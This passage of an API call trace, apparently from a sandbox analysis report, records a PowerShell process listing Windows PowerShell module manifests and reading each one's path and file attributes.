(dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSecurity\\NetSecurity.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSecurity\\NetSecurity.psd1", lpFilePart=0x0) returned 0x4f [0154.225] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.225] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSecurity\\NetSecurity.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netsecurity\\netsecurity.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13f1)) returned 1 [0154.225] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.226] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSwitchTeam\\NetSwitchTeam.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSwitchTeam\\NetSwitchTeam.psd1", lpFilePart=0x0) returned 0x53 [0154.226] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.226] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSwitchTeam\\NetSwitchTeam.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netswitchteam\\netswitchteam.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11048ec0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11048ec0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11048ec0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x420)) returned 1 [0154.226] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.226] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetTCPIP\\NetTCPIP.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetTCPIP\\NetTCPIP.psd1", lpFilePart=0x0) returned 0x49 [0154.226] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.226] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetTCPIP\\NetTCPIP.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\nettcpip\\nettcpip.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x862)) returned 1 [0154.226] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.226] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkConnectivityStatus\\NetworkConnectivityStatus.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkConnectivityStatus\\NetworkConnectivityStatus.psd1", lpFilePart=0x0) returned 0x6b [0154.226] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.226] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkConnectivityStatus\\NetworkConnectivityStatus.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\networkconnectivitystatus\\networkconnectivitystatus.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaada0c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfaada0c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfaada0c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2f6)) returned 1 [0154.226] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.226] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkSwitchManager\\NetworkSwitchManager.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkSwitchManager\\NetworkSwitchManager.psd1", lpFilePart=0x0) returned 0x61 [0154.227] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.227] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkSwitchManager\\NetworkSwitchManager.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\networkswitchmanager\\networkswitchmanager.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe263b10, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe263b10, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe263b10, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x87e)) returned 1 [0154.227] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.227] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkTransition\\NetworkTransition.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkTransition\\NetworkTransition.psd1", lpFilePart=0x0) returned 0x5b [0154.227] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.227] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkTransition\\NetworkTransition.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\networktransition\\networktransition.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaada0c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfaada0c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfaada0c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa6d)) returned 1 [0154.227] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.227] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PcsvDevice\\PcsvDevice.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PcsvDevice\\PcsvDevice.psd1", lpFilePart=0x0) returned 0x4d [0154.227] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.227] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PcsvDevice\\PcsvDevice.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\pcsvdevice\\pcsvdevice.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x209484fa, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x209484fa, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x209484fa, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x34a)) returned 1 [0154.227] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.227] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PKI\\PKI.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PKI\\PKI.psd1", lpFilePart=0x0) returned 0x3f [0154.227] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.228] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PKI\\PKI.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\pki\\pki.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17d5c6b0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x17d5c6b0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x17d5c6b0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x764)) returned 1 [0154.228] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PnpDevice\\PnpDevice.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PnpDevice\\PnpDevice.psd1", lpFilePart=0x0) returned 0x4b [0154.228] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.228] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PnpDevice\\PnpDevice.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\pnpdevice\\pnpdevice.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x159bf51c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x159bf51c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x159bf51c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x329)) returned 1 [0154.228] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PrintManagement\\PrintManagement.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PrintManagement\\PrintManagement.psd1", lpFilePart=0x0) returned 0x57 [0154.228] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.228] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PrintManagement\\PrintManagement.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\printmanagement\\printmanagement.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2131e00c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2131e00c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2131e00c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x20ec)) returned 1 [0154.228] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration\\PSDesiredStateConfiguration.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration\\PSDesiredStateConfiguration.psd1", lpFilePart=0x0) returned 0x6f [0154.228] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.229] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration\\PSDesiredStateConfiguration.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psdesiredstateconfiguration\\psdesiredstateconfiguration.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5fa88f17, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5fa88f17, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5fa88f17, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1198)) returned 1 [0154.229] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psm1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psm1", lpFilePart=0x0) returned 0x53 [0154.229] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.229] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psdiagnostics\\psdiagnostics.psm1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6f3c72, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x995ced79, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x995ced79, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5a52)) returned 1 [0154.231] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1", lpFilePart=0x0) returned 0x53 [0154.231] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.231] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psdiagnostics\\psdiagnostics.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6cda18, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x995ced79, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x995ced79, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x44e)) returned 1 [0154.231] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob\\PSScheduledJob.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob\\PSScheduledJob.psd1", lpFilePart=0x0) returned 0x55 [0154.231] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.231] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob\\PSScheduledJob.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psscheduledjob\\psscheduledjob.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f01a5ef, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f01a5ef, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f01a5ef, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3be)) returned 1 [0154.231] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflow\\PSWorkflow.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflow\\PSWorkflow.psd1", lpFilePart=0x0) returned 0x4d [0154.231] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.231] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflow\\PSWorkflow.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psworkflow\\psworkflow.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63a75f17, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x63a75f17, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x63a75f17, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x496)) returned 1 [0154.232] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflowUtility\\PSWorkflowUtility.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflowUtility\\PSWorkflowUtility.psd1", lpFilePart=0x0) returned 0x5b [0154.232] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.232] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflowUtility\\PSWorkflowUtility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psworkflowutility\\psworkflowutility.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62f22c8c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x62f22c8c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x62f22c8c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x316)) returned 1 [0154.232] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ScheduledTasks\\ScheduledTasks.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ScheduledTasks\\ScheduledTasks.psd1", lpFilePart=0x0) returned 0x55 [0154.232] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.232] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ScheduledTasks\\ScheduledTasks.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\scheduledtasks\\scheduledtasks.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c4c87b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c4c87b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c4c87b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x74a)) returned 1 [0154.232] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\SecureBoot\\SecureBoot.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\SecureBoot\\SecureBoot.psd1", lpFilePart=0x0) returned 0x4d [0154.232] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.232] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\SecureBoot\\SecureBoot.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\secureboot\\secureboot.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15a0b9cd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x15a0b9cd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x15a0b9cd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1fa)) returned 1 [0154.232] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.233] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\SmbShare\\SmbShare.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\SmbShare\\SmbShare.psd1", lpFilePart=0x0) returned 0x49 [0154.233] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.233] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\SmbShare\\SmbShare.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\smbshare\\smbshare.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1005)) returned 1 [0154.233] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.233] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\SmbWitness\\SmbWitness.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\SmbWitness\\SmbWitness.psd1", lpFilePart=0x0) returned 0x4d [0154.233] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.233] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\SmbWitness\\SmbWitness.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\smbwitness\\smbwitness.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14eb873f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14eb873f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14eb873f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c5)) returned 1 [0154.233] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.233] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\StartLayout\\StartLayout.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\StartLayout\\StartLayout.psd1", lpFilePart=0x0) returned 0x4f [0154.233] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.233] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\StartLayout\\StartLayout.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\startlayout\\startlayout.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25f8f56a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x25f8f56a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x25fb57cd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ec)) returned 1 [0154.233] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.233] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Storage\\Storage.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Storage\\Storage.psd1", lpFilePart=0x0) returned 0x47 [0154.234] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.234] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Storage\\Storage.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\storage\\storage.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, 